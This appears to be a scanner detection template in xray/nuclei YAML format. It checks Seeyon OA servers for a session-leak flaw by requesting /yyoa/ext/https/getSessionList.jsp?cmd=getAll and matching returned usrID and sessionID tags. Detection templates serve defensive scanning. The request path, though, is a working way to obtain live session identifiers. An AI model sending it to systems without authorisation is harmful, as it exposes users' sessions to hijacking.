id: seeyon-session-leak

info:
    name: seeyon-session-leak
    author: sakura404x
    severity: high
    reference:
        - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3345.md

rules:
    r0:
        request:
            method: GET
            path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll
        expression: response.status == 200 && response.body.bcontains(b"<usrID>") && response.body.bcontains(b"<sessionID>")
expression: r0()
